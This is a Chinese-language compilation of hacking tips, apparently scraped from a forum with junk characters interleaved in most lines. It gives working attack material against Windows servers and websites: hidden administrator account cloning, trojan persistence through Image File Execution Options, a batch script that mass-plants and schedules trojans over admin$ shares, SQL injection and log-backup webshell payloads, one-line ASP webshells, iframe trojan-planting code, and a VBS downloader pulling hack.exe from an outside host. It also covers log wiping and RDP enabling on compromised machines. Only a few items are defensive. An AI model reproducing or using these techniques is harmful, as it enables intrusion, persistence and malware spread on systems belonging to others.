Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
) }, Q3 X1 h& C3 }5 W" qcacls C:\windows\system32 /G hqw20:R
7 i% X. H9 @, d# j思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入+ W7 B7 L0 O8 G* ^/ h2 h4 Z, ^
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
4 X5 V& k, O7 s8 t, t8 W4 D
+ `9 F' p$ h' a; U$ _1 w% _2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
|# i& _( }+ M# b+ Q% p: f. H8 P# X, T3 ~
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
, J# \: I8 I) i8 q, s" n3 x. Z( i0 Z. X# j! `; _
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
+ U) V: Q7 Q, j) _) |6 V. z; C% g, A% o: U4 W
5、利用INF文件来修改注册表% C! ]: c. e k6 e
[Version]8 s/ \5 w' F% l1 F3 B% Z( B
Signature="$CHICAGO$": q9 M: j& c: w$ U; P" O
[Defaultinstall]; Q$ Y/ Y1 s9 y2 v
addREG=Ating/ `5 U' e9 Q/ O% v! |; e
[Ating] F* w/ w& {: d W6 h8 n0 ?! V
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
0 l# h! J* Z9 H+ c8 @8 T% E以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:* I' {% Z! x2 k% t- u; T! [( E' O2 t. T# l
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径; C- E0 m7 ?$ |
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU4 N- r# I' Z+ K; i" B
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU- C% q8 `0 }2 [. B {
HKEY_CURRENT_CONFIG 简写为 HKCC8 S, a2 u$ q& ]7 [; N5 Z0 Z
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值: i9 t" c: U4 i0 K& e3 ^- Y
"1"这里代表是写入或删除注册表键值中的具体数据) G ]/ @! W. M1 w
; \$ d. e, }3 K6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,. y! w) G1 E' R
多了一步就是在防火墙里添加个端口,然后导出其键值% c: Z, O6 M, I) E: C V' V
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]7 ]( S; O& N" \5 y
. Y& R% s$ A+ d) o
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
8 o3 ?2 A" k' T1 L5 D7 {- H5 J* E! P5 W7 W在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。5 f# o N7 y, z$ o# S
5 E7 c0 g3 I# C- F6 D8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
% A. F+ B r% D
) o7 L$ J6 }! a0 r' H$ F9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,7 c+ ~. z& ^% g% ?; N/ E. z
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
6 C$ z. \4 ]$ ?7 N0 g5 G/ `) _0 e
, H2 `9 P8 G2 n/ q% K% T10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
5 a3 ~. N; b5 z0 Q5 `) y/ a8 q$ j: [: b4 r
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
* ?1 G& b' F+ _1 x6 n用法:xsniff –pass –hide –log pass.txt
8 `* |8 j) ?# \! a! d) |5 D9 `* U, O; S0 C* L- ?- a9 m
12、google搜索的艺术
. O T" ?! Z4 h2 m2 E搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”# L, F" n4 h8 W. ^, ^, | S5 ^8 Z
或“字符串的语法错误”可以找到很多sql注入漏洞。5 ?9 `& i* {7 k$ x! w5 M
7 g* c. C/ F- l! I- e5 ^
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
# E8 K, t) R0 k1 Z$ V, j$ ]
4 d- `. z% B; Z1 l+ |1 f6 n$ ]14、cmd中输入 nc –vv –l –p 1987) U7 }! c5 G1 ^% p0 |& K' a
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
; C7 D& J7 B6 E" ^. w, S' u# `4 G8 I- I
15、制作T++木马,先写个ating.hta文件,内容为& [4 h7 q# k- \# {5 a
<script language="VBScript">* [$ b& D) @6 z& P+ I
set wshshell=createobject ("wscript.shell" )
; [0 B1 U; Y: h$ P# b0 I) Da=wshshell.run("你马的名称",1)/ c8 m# Z, I4 x$ o+ ^
window.close
6 {3 l. W: r9 M</script>
* r8 I5 V$ U4 R$ P \再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
0 O' l c" l$ d2 u+ t
; n7 Z$ D* o; Z6 U- i6 m16、搜索栏里输入9 g6 c$ x: a0 A! H4 J5 `2 C8 P4 u
关键字%'and 1=1 and '%'='9 P- p9 G' L+ q! W% _; H2 Z' S% n
关键字%'and 1=2 and '%'='
7 X4 I/ f8 e1 P比较不同处 可以作为注入的特征字符: `7 T) _. U2 c9 d5 a, D* i
5 X( M# j/ _' [" ]6 u3 M. Z
17、挂马代码<html>7 h5 J# z% }/ Z% p% Z! e
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
2 w0 Q; n$ l5 Z- A `7 w# G- I. @</html>
$ l; i2 [ w4 [( k: C, Q8 O6 e$ U) X* _$ p$ o2 b
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
" L7 a; [8 w, p2 n1 r% P1 ~( }net localgroup administrators还是可以看出Guest是管理员来。5 n7 \$ o2 q1 v- j/ C
$ J& p( `- A8 H: r( J1 S19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
1 s# v0 G4 m+ F+ J H6 [) D用法: 安装: instsrv.exe 服务名称 路径
% @% _) b+ J0 | |* _0 T9 J, n卸载: instsrv.exe 服务名称 REMOVE
- Y: c( @( Z/ r' S" H6 Y2 W6 u' e
# S& L# f$ q0 Z7 @" v, Y- y' u6 c) V
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
7 ?5 Y4 o3 T% T3 R不能注入时要第一时间想到%5c暴库。
6 p9 L0 U3 K, ~2 f, J. L1 Q5 Y6 Y
9 A' z& ^( @$ u, C" z22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
/ a3 U6 U, M: {! H0 J/ J
/ s2 m) G1 v0 K, y6 _23、缺少xp_cmdshell时6 v5 D# _! T) U$ j! P: k, N* Y
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
6 }/ o+ W1 n" E8 G假如恢复不成功,可以尝试直接加用户(针对开3389的)# y9 I/ @/ ]7 G7 F1 c. o
declare @o int
6 A* c, V) U# @: Q0 N# `" a0 `exec sp_oacreate 'wscript.shell',@o out
6 r) W0 i. h' D: Y5 o4 o }' eexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员+ `$ p0 g3 T' D' {0 M O/ r( k G
$ A) o6 F; G( F; O- a24.批量种植木马.bat
* {. Z0 _7 y; e" dfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
' ~2 C/ T8 K; Nfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间$ `: n U2 W! o z2 T0 j
扫描地址.txt里每个主机名一行 用\\开头/ E, J. M6 N# n6 Z% v
) Q( ~2 s) J3 a: Y+ S5 {2 U# ^5 r25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
$ i5 R( I, D" d" r6 m0 m( b! o
1 O% x; [5 H4 N2 |- Z5 L. ?26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
( C( Y6 u* {2 S: W4 q9 F* ~& q将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
7 ]: G3 A8 [$ [* I.cer 等后缀的文件夹下都可以运行任何后缀的asp木马7 W. m9 i+ q2 ^
8 b8 @% U% ?' r9 t
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
& `: [3 T, n2 k. T# w' \: C/ Q然后用#clear logg和#clear line vty *删除日志
+ d3 u2 @8 F4 c4 [& d- Y. U! w Q
28、电脑坏了省去重新安装系统的方法8 |8 N3 t: B. n$ K( \
纯dos下执行,
( `5 i+ g3 m! ~; j O- F' ixp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config* U0 c' v2 x1 z2 s
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
4 P) `" x2 R8 D" {( A+ `& p9 k7 r- T7 A/ M" H5 I
29、解决TCP/IP筛选 在注册表里有三处,分别是:
% m; c0 ]0 T, q( |! F+ RHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
4 Z0 a9 O4 O3 O' J3 nHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
6 h5 T- E6 t' m6 THKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
- s- U6 |; B9 x. l$ _分别用
$ g( j. V$ p0 t: ?+ W2 ?! x. w! mregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
9 s9 q1 P5 {1 G- G1 [2 \regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip1 T- M4 W" d2 \& T/ B
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
7 |: \+ n" m# A& x命令来导出注册表项
& ^! d5 [$ r F/ M, a% J, k然后把三个文件里的EnableSecurityFilters"=dword:00000001,
9 N' x- @2 O9 ^* E; j8 h0 S改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
" }$ m5 Q! [% E! r- ]regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
. D) ]/ n! H9 l4 k# t" u! o0 N' @
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
; N4 R: V4 E+ q1 JSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
! ~. O% `9 d4 Y+ S! Z
" j+ o5 v! ~5 O7 I. c31、全手工打造开3389工具
9 Y" I: a3 \. C2 |2 }$ X i8 `打开记事本,编辑内容如下:
5 O; N4 a& H F1 ~echo [Components] > c:\sql% V) }, u# J& Y# g
echo TSEnable = on >> c:\sql; l: k' W. e' `) o6 H: I2 a
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
' a, X, H7 ^% B, g编辑好后存为BAT文件,上传至肉鸡,执行
4 s- ?. w' S" }* C4 [, Z5 k! h" x8 `/ {' P* @# o2 R a9 p
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
( ?& t, m+ P0 I2 N9 y- ?3 H7 \8 q v2 u \8 T; [$ `2 u
33、让服务器重启
/ A' \0 u5 U o: ~+ g写个bat死循环:
% X& _' g. G. z: p! q8 w@echo off& M8 J( O/ J! M D" Y
:loop1! `' e+ s4 Y! @* w* s! w# G% e
cls
$ n7 ]% Z/ \) Z! C2 M8 n1 Q. wstart cmd.exe
( I. l' p* s& ?1 ngoto loop1
: i5 e8 @; X# C6 g3 F0 A保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启; I+ x+ p0 S$ v# Y" N! r& i0 f
! Q7 c# M* b6 v) P" R
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你, N: I* }# ?' W0 k3 I
@echo off
6 ^2 i1 U( |' }8 Z# x* \* Qdate /t >c:/3389.txt
, w y% l2 j" R: X* atime /t >>c:/3389.txt
& g7 z' M2 l7 w' S: hattrib +s +h c:/3389.bat. D5 m. X, D/ f+ E. _' K
attrib +s +h c:/3389.txt4 D3 ? y1 D5 t" @+ F* g
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
; \8 S( U* Q9 g+ Q+ i并保存为3389.bat
/ {' W" m( ^6 V" o6 D1 {, h打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
# z- H; y& }0 u4 m3 ?3 e6 K1 `9 G
& r" |2 r D3 [- Y/ r% O35、有时候提不了权限的话,试试这个命令,在命令行里输入:
% |3 m* I* i; K- O1 o9 ?9 }- ]start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)4 j% p) j. _* T# l
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。- o7 }$ r" N) V3 F% |7 I
+ e0 Z+ e/ ]1 G! a- @36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
5 U( H# M5 M1 x5 Cecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址% V9 f. \ s! S( D+ l" \
echo 你的FTP账号 >>c:\1.bat //输入账号
$ |* z e+ ^& e U% n$ Fecho 你的FTP密码 >>c:\1.bat //输入密码8 ^- O' y( q" G- o
echo bin >>c:\1.bat //登入
8 x+ T* V6 [" oecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么3 p+ U- O0 ?$ w5 s0 l
echo bye >>c:\1.bat //退出0 i+ A7 H: D# Q* q8 r9 v
然后执行ftp -s:c:\1.bat即可
- R9 p! z6 N4 B! M3 d3 M- s2 X- ?0 @
; W1 t; c. _5 z O37、修改注册表开3389两法. t8 q% W( v" Y6 R2 p
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
' I$ k1 H C8 A( recho Windows Registry Editor Version 5.00 >>3389.reg, {6 j7 J2 p- [4 x! n) x& p+ p
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
: F1 @1 I3 O9 o, wecho "Enabled"="0" >>3389.reg
# A3 Y9 z7 ^: Decho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
/ A9 |. M8 U; ENT\CurrentVersion\Winlogon] >>3389.reg; b; J* Q: H7 z7 v$ d. \* m
echo "ShutdownWithoutLogon"="0" >>3389.reg$ t6 K9 m4 F. e0 A$ L
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]. |# r' _* Z, R% c }3 ]! `2 e
>>3389.reg8 E0 p! @# O/ ~4 `
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg4 ], `. }) q( K, q& b" L* S8 v! `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
6 p0 |6 z4 @0 x: ?8 _>>3389.reg
3 |+ C% O7 i6 \! c8 I6 eecho "TSEnabled"=dword:00000001 >>3389.reg4 k3 ~8 F1 C/ x2 X A2 F, _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg! P% ?! `3 `% ]! j% X: v8 l/ |0 H
echo "Start"=dword:00000002 >>3389.reg: L: U9 V m- |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
: N3 H" ?: x% S+ ?; B; e>>3389.reg
9 R* J4 e {! }/ p; y. Qecho "Start"=dword:00000002 >>3389.reg- K1 R. c( `# e% U; i6 Y$ ~ J
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg$ y' u% R8 u' M, ^& _, I
echo "Hotkey"="1" >>3389.reg. Y: E& E! Z9 U7 M
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 p. T1 E9 b1 M1 Z
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
1 f1 q* r, p" C; k! T' _echo "PortNumber"=dword:00000D3D >>3389.reg
/ F4 y% V% }9 e! h8 [# R0 [, X9 Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal# R E& j: `$ E, j4 _" J
Server\WinStations\RDP-Tcp] >>3389.reg6 b/ g: b/ a- I' D
echo "PortNumber"=dword:00000D3D >>3389.reg
. u( _* V% Z& y4 j2 n9 \把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
c$ n, i$ T* ~& l(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)4 L0 E4 j$ e9 o1 c, r4 W+ W
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
, ^5 J1 ^! m, ?(2)winxp和win2003终端开启1 z9 N6 d% l( }" H- u
用以下ECHO代码写一个REG文件:
* v t* m! M: p1 i4 E& kecho Windows Registry Editor Version 5.00>>3389.reg) F1 }6 Q/ i- W/ a
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal9 M. u8 I+ \! i8 R: x
Server]>>3389.reg. h$ q! q4 Y" u' E
echo "fDenyTSConnections"=dword:00000000>>3389.reg
/ D* B: Q3 x. Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# O" C( y4 e6 `' w% A. P: hServer\Wds\rdpwd\Tds\tcp]>>3389.reg
% u2 Y1 M$ B/ y4 ~2 f/ E+ |5 I% Vecho "PortNumber"=dword:00000d3d>>3389.reg
; t7 @6 K7 Z5 P2 V _- Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' X* C7 ^$ @" D9 S( j) s
Server\WinStations\RDP-Tcp]>>3389.reg- `5 l! j9 f; u2 L4 H4 d7 u, q1 h
echo "PortNumber"=dword:00000d3d>>3389.reg
9 o8 G2 Q8 E+ R W) p1 u' }- O然后regedit /s 3389.reg del 3389.reg% c2 A [2 F; u" O- X/ Z
XP下不论开终端还是改终端端口都不需重启: m/ s7 b9 [! [! `
; x; G& l# a) ?% s) p: p38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
4 {7 d* ~ |' x( E用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
5 l$ u( ~) H6 P8 G5 e! R% B% B- N8 T8 ?! h( S) C4 e9 T
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
/ O" z& }# t' d5 Z5 [8 b6 \) ~(1)数据库文件名应复杂并要有特殊字符2 q2 G/ }, u7 d, ]3 i
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
% B! [9 D4 e, y4 N5 e7 a, d将conn.asp文档中的
( ] T+ z3 v" p7 E/ c! fDBPath = Server.MapPath("数据库.mdb")' c0 n4 i# u, t4 [& h9 b5 C
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
" }. I/ P: }/ t5 m+ p1 c9 h
0 \: U7 ? Z! m- d. J8 x N2 D6 {修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置, }( G* B5 p7 n \1 Q& E
(3)不放在WEB目录里
1 g4 P; e7 Q! L( D, p3 j' O3 M8 }) H3 @( I1 R, y9 M
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
2 j8 m' ?5 i8 [ |可以写两个bat文件' Y" X" ?% a, Q0 n: C" Y
@echo off! x, [1 o0 M; X+ S, _8 W. h, f( F
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
! q t; [4 v2 J% c+ L3 U) y. F% j0 a@del c:\winnt\system32\query.exe
7 \2 u. U9 X' Z8 {/ b9 v& g/ \4 _ D@del %SYSTEMROOT%\system32\dllcache\query.exe
1 h% g$ a7 T; C( Z@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
# ?$ q/ Y/ W4 l" }' s
4 a$ y: K) W i6 f@echo off( b( H1 c+ ?- m, q( J( ]3 s
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe$ u* j$ i2 W& j5 j# S
@del c:\winnt\system32\tsadmin.exe
0 c: @' ]( o, e6 _@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex2 K2 V* d9 |3 J( x" z$ A
* f7 U- C% G- ]. N& o5 p: G f41、映射对方盘符6 n7 f3 _% G) h2 V4 k0 }& J0 H
telnet到他的机器上,! @# ^) l9 C3 b6 c c! R
net share 查看有没有默认共享 如果没有,那么就接着运行2 X$ Z, r \! @3 N+ N& Z7 _. c
net share c$=c:
6 w" X% {: J: f, i2 v znet share现在有c$# k* f {& @" r$ P% b
在自己的机器上运行
I: P; _ _& `) J% j. O' ~3 b N z3 {net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K. }6 S5 G: v. Q8 I" g/ o8 [# F
) Y8 q: Z" h& y& D5 X7 r# Z
42、一些很有用的老知识
, o0 }$ }+ S8 x, h, k' O1 o% Atype c:\boot.ini ( 查看系统版本 )! D$ c3 s8 S2 B3 [4 L" L
net start (查看已经启动的服务)
6 x+ U- B3 Q; aquery user ( 查看当前终端连接 )
, p& |8 u6 L% t x3 m2 Y* bnet user ( 查看当前用户 )
; A% j) L, r; d8 D( V! }# Anet user 用户 密码/add ( 建立账号 )
7 c0 A( Q/ e, }' `* Pnet localgroup administrators 用户 /add (提升某用户为管理员)
9 {/ H% f2 B5 E* U* Z& |' Yipconfig -all ( 查看IP什么的 )
0 w/ c5 l& R% u: F. Wnetstat -an ( 查看当前网络状态 )7 R* f5 j' l0 s, t, u- {/ Y7 B8 g
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)+ d$ Y5 }. h. Q d
克隆时Administrator对应1F4/ R( i% [6 n' F7 g o! Q: D) u! Y8 }
guest对应1F5
& E0 f+ y0 w) e2 S/ [0 n9 ^tsinternetuser对应3E8
/ L+ Q/ k W, L" X, F
2 F! k2 n$ z/ Q w6 f7 I, Y/ v43、如果对方没开3389,但是装了Remote Administrator Service8 I) N4 V6 Y; W
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
{5 h! S0 s4 M- B9 w) N解释:用serv-u漏洞导入自己配制好的radmin的注册表信息) Y) s* p) i% s
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
5 s+ S7 {8 k {2 Y! i( S5 A: ^& m' J' z, q
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
7 e8 W, C* E; R! `本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
, t; A- z- p6 y) ~, v- A, A7 F* P* z+ U0 L3 N& T, [" P
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)% @. O5 h7 N. q
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
1 l% m, A4 ^; K& u^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = P6 j1 f: p8 g& s1 w# {
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =$ n$ ^- n8 w* Q+ x; Q8 {
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
5 S! _6 d6 H, f. z- v5 k(这是完整的一句话,其中没有换行符)3 _8 \- j" S0 g+ m: j4 N% q
然后下载:
?% M. d l9 B' \, [- q4 W& Xcscript down.vbs http://www.hack520.org/hack.exe hack.exe* V; I) M$ K' P* }2 y
* a) Z- i# H+ Y1 b% b9 K# \# z
46、一句话木马成功依赖于两个条件:7 l5 q) r1 q" l, r
1、服务端没有禁止adodb.Stream或FSO组件
' b& [/ v/ d- J! V! _5 }2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。- k- m! R; U& `- ?7 B# H" a/ w
- A- i4 f( W. H; Y
47、利用DB_OWNER权限进行手工备份一句话木马的代码:) t; \+ ^1 B$ P3 s' ^, U
;alter database utsz set RECOVERY FULL--
4 u: ?# N/ _% F& ^; D0 T;create table cmd (a image)--
5 f$ R p. ~8 `+ X- r* l;backup log utsz to disk = 'D:\cmd' with init--' X! @2 L9 Q; w3 w% S
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
' Z( a/ l8 T7 Q9 J1 };backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
+ R! j/ a4 l! t注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。/ Q, E4 }1 D' C: C7 C, E2 O
|1 _. T4 W" R& E8 m' {4 k48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
3 u2 K+ L9 k4 P! P6 b) N6 S& G, ` c" W& `& }$ M5 |( O; ]! e p# L
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options- d# U) j( W0 U4 H: @$ Y- E5 l
所有会话用 'all'。
- p+ k- ?7 L8 `; I* l-s sessionid 列出会话的信息。6 G3 F5 f3 k5 R# }' P, Y
-k sessionid 终止会话。
# k+ \0 l. z' f/ Z$ V. a$ ?-m sessionid 发送消息到会话。: \/ f% s/ g% V0 ?8 T
! x9 F* r$ C% ^config 配置 telnet 服务器参数。5 r; j$ C3 P) z! ^% c+ ?0 U' m
/ e2 N8 c- E$ a& _% j
common_options 为:
% ^+ i. u- J( f7 j' X5 s: t5 @* u- \-u user 指定要使用其凭据的用户
n3 C: }6 [2 Q3 X0 _-p password 用户密码 J; w. W {8 j3 D1 O8 |
( S" W* B6 J- a9 `8 }: b) ]
config_options 为:# w8 m6 [" c: a( n4 V
dom = domain 设定用户的默认域
J. S4 M8 X& xctrlakeymap = yes|no 设定 ALT 键的映射
* d6 `4 w9 e7 e8 P2 H& Ktimeout = hh:mm:ss 设定空闲会话超时值3 I9 N, V+ `: P+ V5 [9 i
timeoutactive = yes|no 启用空闲会话。/ @; N* W( f! C0 K- s3 W
maxfail = attempts 设定断开前失败的登录企图数。( i5 P! a7 i, p c* K, W% q/ M6 O
maxconn = connections 设定最大连接数。
9 g9 t2 {, |# w. G$ c" T' b1 U# uport = number 设定 telnet 端口。
) @5 ^8 ]# F- l7 zsec = [+/-]NTLM [+/-]passwd
2 ]% \+ o V" K( c+ m3 U& p( ~3 |( b设定身份验证机构: O# U8 f2 u7 x* n
fname = file 指定审计文件名。! H0 l& J$ \( S4 [- ^* c- ]
fsize = size 指定审计文件的最大尺寸(MB)。
( Y$ F1 {8 u0 B2 _7 umode = console|stream 指定操作模式。: d+ | ^0 b% M3 {$ t, A$ a: @
auditlocation = eventlog|file|both' t5 s& i% S7 d! M2 m
指定记录地点, Q1 U0 L" F2 W; l8 g" w1 K
audit = [+/-]user [+/-]fail [+/-]admin9 ]; u+ d3 P3 O1 m8 d
8 y6 T2 Q; n" k+ X0 p/ ~, ~* _2 z
49、例如:在IE上访问:
# }, Y3 q: f' ?www.hack520.org/hack.txt就会跳转到http://www.hack520.org/. a8 d1 V% c+ Q
hack.txt里面的代码是:
+ W, T4 v0 A. a<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">8 K1 V3 y2 H* [
把这个hack.txt发到你空间就可以了!
3 Z% g: h$ V* f% x9 k$ \这个可以利用来做网马哦!' y- H: ^2 Y5 j! i u |% E' m
, T7 n; u6 ?1 `' q' v! \! }7 L50、autorun的病毒可以通过手动限制!$ U, d4 h5 d0 P0 g5 S1 U0 @4 _
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!7 b& Q) r9 p# s# f
2,打开盘符用右键打开!切忌双击盘符~
0 H. l! U( k+ b- f9 A* k* S- { H$ }: O3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
1 F! E, \* \/ r! q' s$ n, H' a1 R7 O0 R) M- [
51、log备份时的一句话木马:
9 Z0 m l+ I g5 y7 t/ }a).<%%25Execute(request("go"))%%25>
% j# ^; }% p! Yb).<%Execute(request("go"))%>5 W& m- j* W: _" d7 T
c).%><%execute request("go")%><%
# p- V$ ]+ Z/ @ O) Bd).<script language=VBScript runat=server>execute request("sb")</Script>
3 E) [3 @8 B: D8 P' R9 Ae).<%25Execute(request("l"))%25>9 O0 ^' a# A" t5 r G: k% g: Q
